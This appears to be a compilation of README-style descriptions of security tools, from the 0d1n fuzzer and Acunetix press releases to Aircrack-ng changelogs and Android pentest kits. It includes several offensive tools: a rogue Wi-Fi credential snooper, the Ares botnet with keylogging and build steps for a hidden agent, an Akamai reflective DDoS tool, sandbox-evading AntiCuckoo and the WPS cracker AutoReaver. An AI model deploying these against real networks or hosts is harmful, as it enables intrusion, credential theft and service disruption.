



0d1n is a web security tool for fuzzing HTTP inputs, written in C with libcurl.

It can:

- brute-force passwords in authentication forms

- disclose directories (use a PATH list to brute-force paths and check the HTTP status codes)

- test a list of payloads against inputs to find SQL injection and XSS vulnerabilities

To run:

Requires libcurl-dev, or libcurl-devel on RPM-based Linux distributions.

$ git clone https://github.com/CoolerVoid/0d1n/

$ sudo apt-get install libcurl-dev

$ sudo yum install libcurl-devel

$ make





$ ./0d1n

3vilTwinAttacker - Create a Rogue Wi-Fi Access Point and Snoop on the Traffic



This tool creates a rogue Wi-Fi access point that purports to provide wireless Internet service while snooping on the traffic.

Software dependencies:

- Kali Linux (recommended).

- Ettercap.

- Sslstrip.

- Airbase-ng (included in aircrack-ng).

- DHCP.

- Nmap.

Install DHCP on Debian-based systems

Ubuntu

$ sudo apt-get install isc-dhcp-server

Kali Linux

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list

$ apt-get update && apt-get install isc-dhcp-server

Install DHCP on Red Hat-based systems

Fedora

$ sudo yum install dhcp

Tool Options:

Etter.dns: Edit etter.dns to load the DNS spoof module.

Dns Spoof: Start a DNS spoofing attack on the fake AP interface ath0.

Ettercap: Start an Ettercap attack against hosts connected to the fake AP, capturing login credentials.

Sslstrip: sslstrip listens to the traffic on port 10000.

Driftnet: driftnet sniffs and decodes any JPEG TCP sessions, then displays them in a window.



Deauth Attack: Disconnects all devices connected to the AP (wireless network). The attacker can also put a MAC address in the Client field, in which case only that client is disconnected from the access point.

Probe Request: Captures probe requests from clients trying to connect to an AP. Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.

Mac Changer: Spoofs the MAC address. Users can change their MAC address with a few clicks.

Device FingerPrint: Lists the devices connected to the network with a mini fingerprint, that is, information collected about a local computing device.

Video Demo





Acunetix clamps down on costly website security with online solution

2nd March 2015 - London, UK - As cyber security continues to hit the headlines, even smaller companies can expect to be subject to scrutiny and therefore securing their website is more important than ever. In response to this, Acunetix are offering the online edition of their vulnerability scanner at a new lower entry price. This new option allows consumers to opt for the ability to scan just one target or website and is a further step in making the top of the range scanner accessible to a wider market.

A web vulnerability scanner allows the user to identify any weaknesses in their website architecture which might aid a hacker. They are then given the full details of the problem in order to fix it. While the scanner might previously have been a niche product used by penetration testers, security experts and large corporations, in our current cyber security climate, such products need to be made available to a wider market. Acunetix have recognised this which is why both the product and its pricing have become more flexible and tailored to multiple types of user, with a one scan target option now available at $345. Pricing for other options has also been reduced by around 15% to reflect the current strength of the dollar. Use of the network scanning element of the product is also currently being offered completely free.

Acunetix CEO Nicholas Galea said: ‘Due to recent attacks such as the Sony hack and the Anthem Inc breach, companies are under increasing pressure to ensure their websites and networks are secure. We’ve been continuously developing our vulnerability scanner for a decade now, it’s a pioneer in the field and continues to be the tool of choice for many security experts. We feel it’s a tool which can benefit a far wider market which is why we developed the more flexible and affordable online version.’

About Acunetix Vulnerability Scanner (Online version)

User-friendly and competitively priced, Acunetix Vulnerability Scanner fully interprets and scans websites, including HTML5 and JavaScript and detects a large number of vulnerabilities, including SQL Injection and Cross Site Scripting, eliminating false positives. Acunetix beats competing products in many areas; including speed, the strongest support of modern technologies such as JavaScript, the lowest number of false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of reports including HIPAA and PCI compliance.

Users can sign up for a trial of the online version of Acunetix which includes the option to run free network scans.

Acunetix Online Vulnerability Scanner

Acunetix Online Vulnerability Scanner acts as a virtual security officer for your company, scanning your websites, including integrated web applications, web servers and any additional perimeter servers for vulnerabilities, and allowing you to fix them before hackers exploit the weak points in your IT infrastructure!

Leverages Acunetix leading web application scanner

Building on Acunetix’ advanced web scanning technology, Acunetix OVS scans your website for vulnerabilities – without requiring you to license, install and operate Acunetix Web Vulnerability scanner. Acunetix OVS will deep scan your website – with its legendary crawling capability – including full HTML 5 support, and its unmatched SQL injection and Cross Site Scripting finding capabilities.

Unlike other online security scanners, Acunetix is able to find a much greater number of vulnerabilities because of its intelligent analysis engine – it can even detect DOM Cross-Site Scripting and Blind SQL Injection vulnerabilities, and with a minimum of false positives. Remember that in the world of web scanning it's not the number of different vulnerabilities that a scanner can find, it's the depth with which it can check for vulnerabilities. Each scanner can find one or more SQL injection vulnerabilities, but few can find ALMOST ALL. Few scanners are able to find all pages and analyze all content, leaving large parts of your website unchecked. Acunetix will crawl the largest number of pages and analyze all content.

Utilizes OpenVAS for cutting edge network security scanning

And Acunetix OVS does not stop at web vulnerabilities. Recognizing the need to scan at network level and wanting to offer best of breed technology only, Acunetix has partnered with OpenVAS – the leading network security scanner. OpenVAS has been in development for more than 10 years and is backed by renowned security developers Greenbone. OpenVAS draws on a vulnerability database of thousands of network level vulnerabilities. Importantly, OpenVAS vulnerability databases are always up to date, boasting an average response rate of less than 24 hours for updating and deploying vulnerability signatures to scanners.

Start your scan today

Getting Acunetix on your side is easy – sign up in minutes, install the site verification code and your scan will commence. Scanning can take several hours, depending on the number of pages and the complexity of the content. After completion, scan reports are emailed to you – and Acunetix Security Consultants are on standby to explain the results and help you with remediation. For a limited time period, 2 full Network Scans are included for FREE in the 14-day trial.

Acunetix v10 - Web Application Security Testing Tool

Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over £3m per breach, at the higher end.

The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its ‘Login Sequence Recorder’ which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its ‘DeepScan’ crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.

Automated scanning of restricted areas

The latest automation functionality not only makes Acunetix even easier to use, but also gives better peace of mind by ensuring the entire website is scanned. Restricted areas, especially user login pages, are more difficult for a scanner to access and often require manual intervention. The Acunetix “Login Sequence Recorder” overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. With the recorder following user actions rather than HTTP requests, it drastically improves support for anti-CSRF tokens, nonces or other one-time tokens, which are often used in restricted areas.

Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.



Support for various development architectures and web services

Many enterprise-grade, mission-critical applications are built using Java Frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 Single Page Applications and mobile applications, web services have become a significant attack vector. The new version improves support for SOAP-based web services with WSDL and WCF descriptions as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10 introduces dynamic crawl pre-seeding by integrating with external, third-party tools including Fiddler, Burp Suite and the Selenium IDE to enhance Business Logic Testing and the workflow between Manual Testing and Automation.

Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10

- 'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.

- Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.

- Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.

- Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.

- Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.

- Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

Aircrack-ng 1.2 RC 2 - WEP and WPA-PSK keys cracking program

Here is the second release candidate. Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is that recent versions of GPSd now work very well with Airodump-ng.

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:

- More cards/drivers supported

- More OS and platforms supported

- PTW attack

- WEP dictionary attack

- Fragmentation attack

- WPA Migration mode

- Improved cracking speed

- Capture with multiple cards

- New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng

- Optimizations, other improvements and bug fixing

- …

Aircrack-ng 1.2 RC 3 - WEP and WPA-PSK Keys Cracking Program

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Third release candidate and hopefully this should be the last one.

It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere.

Some features were added: AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD.

Aircrack-ng Changelog

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) - Released 21 Nov 2015:

- Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown.

- Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake

- Aircrack-ng: Fixed compilation warnings.

- Aircrack-ng: Removed redundant NULL check and fixed typo in another one.

- Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check.

- Airmon-ng: Created version for FreeBSD.

- Airmon-ng: Prevent passing invalid values as channel.

- Airmon-ng: Handle udev renaming interfaces.

- Airmon-ng: Better handling of rfkill.

- Airmon-ng: Updated OUI URL.

- Airmon-ng: Fix VM detection.

- Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly.

- Airmon-ng: Various cleanup and fixes (including wording and typos).

- Airmon-ng: Display iw errors.

- Airmon-ng: Improved handling of non-monitor interfaces.

- Airmon-ng: Fixed error when running 'check kill'.

- Airdrop-ng: Display error instead of stack trace.

- Airmon-ng: Fixed bashism.

- Airdecap-ng: Allow specifying output file names.

- Airtun-ng: Added missing parameter to help screen.

- Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain).

- Airgraph-ng: Display error when no graph type is specified.

- Airgraph-ng: Fixed make install.

- Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages.

- Aircrack-ng GUI: Fixes issues with wordlists selection.

- OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.

- OSdep: Fix possible infinite loop.

- OSdep: Use a default MTU of 1500 (Linux only).

- OSdep: Fixed compilation on OSX.

- AppArmor: Improved and added profiles.

- General: Fixed warnings reported by clang.

- General: Updated TravisCI configuration file

- General: Fixed typos in various tools.

- General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt > 1.6.0.

- General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET

- General: Fixed compilation with musl libc.

- General: Improved testing and added test cases (make check).

- General: Improved mutexes handling in various tools.

- General: Fixed memory leaks, use after free, null termination and return values in various tools and OSdep.

- General: Fixed compilation on FreeBSD.

- General: Various fixes and improvements to README (wording, compilation, etc).

- General: Updated copyrights in help screen.



AntiCuckoo - A Tool to Detect and Crash Cuckoo Sandbox

A tool to detect and crash Cuckoo Sandbox. Tested in Cuckoo Sandbox Official and Accuvant's Cuckoo version.

Features

- Detection:

- Cuckoo hooks detection (all kind of cuckoo hooks).

- Suspicious data in own memory (without APIs, page per page scanning).



- Crash (execute with arguments; outside a sandbox these args don't crash the program):

- -c1: Modify the RET N instruction of a hooked API with a higher value, so that the next call to the API pushes more args onto the stack. If the hooked API is called from Cuckoo's HookHandler, the program crashes, because the handler only pushes the real API args and the modified RET N instruction then corrupts the HookHandler's stack.

Cuckoo Detection

Submit Release/anticuckoo.exe for analysis in Cuckoo Sandbox. Check the screenshots (console output). You can also check Accessed Files in Summary:

Accessed Files in Summary (django web):

Cuckoo Crash

Specify in submit options the crash argument, ex -c1 (via django web):

And check Screenshots/connect via RDP/whatson connection to verify the crash. Ex -c1 via RDP:

AppCrashView - View Application Crashes (.wer files)

AppCrashView is a small utility for Windows Vista and Windows 7 that displays the details of all application crashes that occurred on your system. The crash information is extracted from the .wer files created by the Windows Error Reporting (WER) component of the operating system every time a crash occurs.

AppCrashView also allows you to easily save the crash list to a text/csv/html/xml file.
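As a rough illustration of the kind of data held in a .wer report, the sketch below parses report text into a dictionary. It assumes the report is a plain list of `Key=Value` lines, stored on disk as UTF-16 text. The function names `parse_wer_text` and `load_wer_file` and the sample values are hypothetical and are not taken from AppCrashView itself.

```python
def parse_wer_text(text):
    """Parse 'Key=Value' lines from WER report text into a dict.

    Assumption: each meaningful line has the form Key=Value; lines
    without an '=' separator are ignored.
    """
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:  # skip lines that carry no separator
            fields[key.strip()] = value.strip()
    return fields


def load_wer_file(path):
    """Read a .wer file from disk (assumed to be UTF-16 with a BOM)."""
    with open(path, encoding="utf-16") as handle:
        return parse_wer_text(handle.read())


if __name__ == "__main__":
    # Hypothetical sample content, for illustration only.
    sample = (
        "Version=1\n"
        "EventType=APPCRASH\n"
        "Sig[0].Name=Application Name\n"
        "Sig[0].Value=example.exe\n"
    )
    report = parse_wer_text(sample)
    print(report["EventType"], report["Sig[0].Value"])
```

Splitting on the first `=` only keeps values that themselves contain an equals sign intact.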

System Requirements

For now, this utility only works on Windows Vista, Windows 7, and Windows Server 2008, simply because the earlier versions of Windows don't save the crash information into .wer files. It's possible that in future versions, I'll also add support for Windows XP/2000/2003 by using Dr. Watson (Drwtsn32.exe) or other debug component that capture the crash information.

Using AppCrashView

AppCrashView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - AppCrashView.exe. The main window of AppCrashView contains 2 panes. The upper pane displays the list of all crashes found in your system, while the lower pane displays the content of the crash file that you select in the upper pane.

You can select one or more crashes in the upper pane, and then save them (Ctrl+S) into a text/html/xml/csv file or copy them to the clipboard and paste them into Excel or another spreadsheet application.

Command-Line Options


| Option | Description |
| --- | --- |
| /ProfilesFolder <Folder> | Specifies the user profiles folder (e.g: c:\users) to load. If this parameter is not specified, the profiles folder of the current operating system is used. |
| /ReportsFolder <Folder> | Specifies the folder that contains the WER files you wish to load. |
| /ShowReportQueue <0 \| 1> | Specifies whether to enable the 'Show ReportQueue Files' option. 1 = enable, 0 = disable |
| /ShowReportArchive <0 \| 1> | Specifies whether to enable the 'Show ReportArchive Files' option. 1 = enable, 0 = disable |
| /stext <Filename> | Save the list of application crashes into a regular text file. |
| /stab <Filename> | Save the list of application crashes into a tab-delimited text file. |
| /scomma <Filename> | Save the list of application crashes into a comma-delimited text file (csv). |
| /stabular <Filename> | Save the list of application crashes into a tabular text file. |
| /shtml <Filename> | Save the list of application crashes into HTML file (Horizontal). |
| /sverhtml <Filename> | Save the list of application crashes into HTML file (Vertical). |
| /sxml <Filename> | Save the list of application crashes into XML file. |
| /sort <column> | This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Event Name" and "Process File". You can specify the '~' prefix character (e.g: "~Event Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns.<br>Examples:<br>AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort 2 /sort ~1<br>AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort "Process File" |
| /nosort | When you specify this command-line option, the list will be saved without any sorting. |
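The save and sort options above can be combined from a script. The following is a minimal sketch, assuming AppCrashView.exe is reachable on a Windows host. The helper names `build_export_command` and `export_crashes` and the output path are hypothetical; only the `/scomma` and `/sort` options and the `~` prefix come from the option list.

```python
import subprocess


def build_export_command(exe, csv_path, sort_columns=()):
    """Build the argument list for a CSV export with optional sorting."""
    command = [exe, "/scomma", csv_path]
    for column in sort_columns:
        # Each column gets its own /sort; a '~' prefix means descending.
        command += ["/sort", column]
    return command


def export_crashes(exe, csv_path, sort_columns=()):
    """Run the export; only meaningful on a Windows host with the tool."""
    command = build_export_command(exe, csv_path, sort_columns)
    return subprocess.run(command, check=True)


if __name__ == "__main__":
    # Print the command instead of running it, so the sketch works anywhere.
    print(build_export_command(
        "AppCrashView.exe",
        r"f:\temp\crashlist.csv",
        ["Process File", "~Event Time"],
    ))
```

Passing the arguments as a list avoids manual quoting of column names that contain spaces.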



Appie - Android Pentesting Portable Integrated Environment

Appie is a software package that has been pre-configured to function as an Android Pentesting Environment. It is completely portable and can be carried on a USB stick. This is a one stop answer for all the tools needed in Android Application Security Assessment.

What is the difference between Appie and existing environments?

- Tools contained in Appie run on the host machine instead of on a virtual machine.

- Less space needed (only 600MB, compared to at least 8GB for a virtual machine).

- As the name suggests, it is completely portable, i.e. it can be carried on a USB stick or on your own smartphone, and your pentesting environment will go wherever you go without any differences.

- Awesome Interface

Which tools are included in Appie?

- Drozer

- dex2jar

- Androguard

- Introspy-Analyzer

- Jd-Gui

- Android Debug Bridge

- Apktool

- Sublime Text

- Androguard SublimeText Plugin

- Eclipse with Android Developer Tools

- Owasp GoatDroid Project Configured

- Fastboot and sqlite3

- Java Runtime Environment and Python files. With these you don’t even need to have Python or the Java Runtime Environment installed on the computer.

- Nearly all UNIX commands like ls, cat, chmod, cp, find, git, unzip, mkdir, ssh, openssl, keytool, jarsigner and many others

AppUse - Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the Android environment, and it includes unique custom-made tools.


Faster & More Powerful

The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted for penetration testing teams who are interested in a convenient, personalized platform for Android application security testing, for catching security problems and analysis of the application traffic.

Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.

Easy to Use

There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software; everything comes straight out of the box pre-installed and configured for an ideal user experience.

Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a famous system for testing security problems), specifically adjusted for Android application security testing.

AppUse VM closes gaps in the world of security: now there is a special and customized testing environment for Android applications. An environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.

This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.

We at AppSec Labs do not stagnate. Specifically at a time in which so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features

- New Application Data Section

- Tree-view of the application’s folder/file structure

- Ability to pull files

- Ability to view files

- Ability to edit files

- Ability to extract databases

- Dynamic proxy managed via the Dashboard

- New application-reversing features

- Updated ReFrameworker tool

- Dynamic indicator for Android device status

- Bugs and functionality fixes

ARDT - Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Based on the research done at NCC: (https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf)

Akamai boasts around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc., to ensure that a minimal number of requests actually hit the origin web server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, and will result in a cache miss, with the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a list of 100,000 Akamai edge nodes, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/s hitting the origin server, which is a hell of a lot of traffic.
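The arithmetic behind that estimate can be checked with a few lines. This is only a sketch of the calculation, assuming 1 MB = 1024 KB. The function name `origin_traffic_mb_per_s` is hypothetical, and reading the quoted figure as 100,000 origin requests per second is an interpretation, not something the text states.

```python
def origin_traffic_mb_per_s(requests_per_second, response_kb):
    """Traffic reaching the origin in MB/s, taking 1 MB = 1024 KB."""
    return requests_per_second * response_kb / 1024


if __name__ == "__main__":
    # 50 client IPs at 20 requests per second each, 10 KB per response.
    client_rate = 50 * 20
    print(origin_traffic_mb_per_s(client_rate, 10))

    # The quoted figure of roughly 976 MB/s corresponds to 100,000 origin
    # requests per second at 10 KB each (an interpretation of the text).
    print(origin_traffic_mb_per_s(100_000, 10))
```

Under these assumptions the client rate alone gives just under 10 MB/s, so the larger figure only follows if the origin sees about 100,000 requests per second.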

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:

# python ARDT_Akamai_EdgeNode_Finder.py

The script can easily be edited to find more nodes; it saves the IPs automatically.





Ares - Python Botnet and Backdoor

Ares is made of two main programs:

- A Command aNd Control server, which is a Web interface to administer the agents

- An agent program, which is run on the compromised host, and ensures communication with the CNC

The client is a Python program meant to be compiled as a win32 executable using pyinstaller. It depends on the requests, pythoncom, pyhook python modules and on PIL (Python Imaging Library).

It currently supports:

- remote cmd.exe shell

- persistence

- file upload/download

- screenshot

- key logging

Installation

Server

To install the server, first create the sqlite database:

cd server/

python db_init.py

If it is not installed, install the cherrypy python package.

Then launch the server by issuing: python server.py

By default, the server listens on http://localhost:8080

Agent

The agent can be launched as a python script, but it is ultimately meant to be compiled as a win32 executable using pyinstaller.

First, install all the dependencies:

- requests

- pythoncom

- pyhook

- PIL

SERVER_URL = URL of the CNC http server

BOT_ID = the (unique) name of the bot, leave empty to use hostname

DEBUG = should debug messages be printed to stdout ?

IDLE_TIME = time of inactivity before going in idle mode (the agent checks the CNC for commands far less often when idle).

REQUEST_INTERVAL = interval between each query to the CNC when active

Finally, use pyinstaller to compile the agent into a single exe file:

cd client/

pyinstaller --onefile --noconsole agent.py

AsHttp - Shell Command to Expose any other Command as HTTP



ashttp provides a simple way to expose any shell command over HTTP. For example, to expose top over HTTP, try: ashttp -p8080 top; then open http://localhost:8080.

Dependencies

ashttp depends on hl_vt100, a headless VT100 emulator.

To get and compile hl_vt100:

$ git clone https://github.com/JulienPalard/vt100-emulator.git

$ aptitude install python-dev

$ make python_module

$ python setup.py install

Usage

ashttp can serve any text application over HTTP, for example:

$ ashttp -p 8080 top

$ ashttp -p 8080 watch -n 1 ls -lah /tmp

The second command serves a continuously refreshed directory listing of /tmp.
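The general idea of serving a command's output over HTTP can be sketched with the Python standard library. This is not how ashttp is implemented: it does no VT100 emulation and simply reruns the command on every request. The names `run_command` and `make_handler`, the script name in the comment, and the bind address are assumptions made for the example.

```python
import subprocess
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer


def run_command(command):
    """Run the command once and return its combined output as bytes."""
    result = subprocess.run(
        command,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        check=False,
    )
    return result.stdout


def make_handler(command):
    """Create a handler class that answers every GET with fresh output."""

    class CommandHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = run_command(command)
            self.send_response(200)
            self.send_header("Content-Type", "text/plain; charset=utf-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    return CommandHandler


if __name__ == "__main__" and len(sys.argv) > 1:
    # Example: python serve_command.py ls -lah /tmp
    # Binds to localhost only, so the output is not exposed to the network.
    server = HTTPServer(("127.0.0.1", 8080), make_handler(sys.argv[1:]))
    server.serve_forever()
```

Rerunning the command per request suits one-shot commands such as ls. Interactive programs such as top need a terminal emulator, which is the role hl_vt100 plays for ashttp.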







ATSCAN - Server, Site and Dork Scanner

Description:

- ATSCAN Version 2

- Dork scanner.

- XSS scanner.

- Sqlmap.

- LFI scanner.

- Filter WordPress and Joomla sites on the server.

- Find Admin page.

- Decode / Encode MD5 + Base64.

Libraries to install:

$ apt-get install libxml-simple-perl

Permissions & Execution:

$ chmod +x atscan.pl

$ perl ./atscan.pl

Screenshots:





AutoBrowser - Create Report and Screenshots of HTTP/s Based Ports on the Network

AutoBrowser is a tool written in python for penetration testers.

The purpose of this tool is to create report and screenshots of http/s based ports on the network.

It analyze Nmap Report or scan with Nmap,

Check the results with http/s request on each host using headless web browser,

Grab a screenshot of the response page content.

- This tool is designed for IT professionals to perform penetration testing to scan and analyze NMAP results.
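The first step described above, finding HTTP/S ports in an Nmap report, can be sketched as follows. This is a minimal illustration using Nmap's XML output format (`-oX`), not AutoBrowser's own code; the function name `http_urls_from_nmap_xml` is hypothetical, and treating any service whose name contains "http" as a web port is an assumption made for brevity.

```python
import xml.etree.ElementTree as ET


def http_urls_from_nmap_xml(xml_text):
    """Return URLs for open ports whose detected service looks like HTTP/S."""
    urls = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        # Pick the IP address, skipping MAC address entries.
        ip = next(
            (a.get("addr") for a in host.findall("address")
             if a.get("addrtype") in ("ipv4", "ipv6")),
            None,
        )
        if ip is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            if state is None or state.get("state") != "open" or service is None:
                continue
            name = service.get("name", "")
            if "http" not in name:  # assumption: a simple name-based filter
                continue
            secure = name == "https" or service.get("tunnel") == "ssl"
            scheme = "https" if secure else "http"
            urls.append(f"{scheme}://{ip}:{port.get('portid')}")
    return urls
```

Each returned URL could then be handed to a headless browser for the request and screenshot steps.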

Examples

Values passed to CLI arguments must be delimited by double quotes only!

- Get the argument details of the scan method:

python AutoBrowser.py scan --help

- Scan with Nmap, check the results and create a folder named project_name:

python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name

- Get the argument details of the analyze method:

python AutoBrowser.py analyze --help

- Analyze an Nmap XML report and create a folder named report_analyze:

python AutoBrowser.py analyze nmap_file.xml --project report_analyze

Requirements:

Linux Installation:

- sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap

- sudo pip install -r requirements.txt

MacOSx Installation:

- Install Xcode Command Line Tools (AppStore)

- ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"

- brew install pyqt nmap

- sudo easy_install pip

- sudo pip install -r requirements.txt

Windows Installation:

- Install setuptools

- Install pip

- Install PyQt4

- Install Nmap

- Open Command Prompt (cmd) as Administrator -> go to the Python folder -> Scripts (cd c:\Python27\Scripts)

- pip install -r (full path to requirements.txt)

AutoReaver - Multiple Access Point Targets Attack Using Reaver

AutoReaver is a bash script which provides a multiple access point attack using reaver and a list of BSSIDs from a text file.

If the AP being processed reaches its rate limit, the script moves on to the next one on the list, and so forth.


HOW IT WORKS?

The script takes the AP targets list from a text file in the following format:

BSSID CHANNEL ESSID

AA:BB:CC:DD:EE:FF 1 MyWlan

00:BB:CC:DD:EE:FF 13 TpLink

00:22:33:DD:EE:FF 13 MyHomeSSID

- Every line of the list file is checked separately in a for loop.

- After every AP on the list has been checked once, the script automatically changes the MAC address of your card to a random MAC using macchanger (you can also set your own MAC if you need to).

- The whole list is checked again and again in an endless while loop; the loop stops only when there is nothing left to check.

- Found PINs/WPA passphrases are stored in the {CRACKED_LIST_FILE_PATH} file.
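To make the list format concrete, here is a minimal Python sketch of a parser for it. AutoReaver itself is a bash script, so this is only an illustration; the `Target` type and `parse_targets` function are hypothetical names. The sketch assumes the `BSSID CHANNEL ESSID` line is a header to be skipped, and it honours two conventions the script documents for the targets file: a leading `#` disables an entry, and a channel of `R` means the channel is found at run time.

```python
from typing import List, NamedTuple, Optional


class Target(NamedTuple):
    bssid: str
    channel: Optional[int]  # None stands for "R" (channel found at run time)
    essid: str


def parse_targets(text: str) -> List[Target]:
    """Parse 'BSSID CHANNEL ESSID' lines into Target records."""
    targets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or disabled AP
        parts = line.split(None, 2)
        if len(parts) != 3 or parts[0].upper() == "BSSID":
            continue  # malformed line or the (assumed) header line
        bssid, channel, essid = parts
        targets.append(
            Target(bssid.upper(), None if channel.upper() == "R" else int(channel), essid)
        )
    return targets
```

Splitting at most twice keeps an ESSID that contains spaces in one piece.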

REQUIREMENTS

- Wireless adapter which supports injection (see the Reaver Wiki: https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers)

- Linux Backtrack 5

- Root access on your system (otherwise some things may not work)

- If you use another Linux distribution, you also need:

- Reaver 1.4 (I didn't try it with previous versions)

- KDE (unless you'll change 'konsole' invocations to 'screen', 'gnome-terminal' or something like that... this is easy)

- Gawk (Gnu AWK)

- Macchanger

- Airmon-ng, Airodump-ng, Aireplay-ng

- Wash (WPS Service Scanner)

- Perl

USAGE EXAMPLE

First you have to download the latest version:

git clone https://code.google.com/p/auto-reaver/

cd ./auto-reaver

chmod 700 ./washAutoReaver

chmod 700 ./autoReaver

./washAutoReaverList > myAPTargets

cat ./myAPTargets

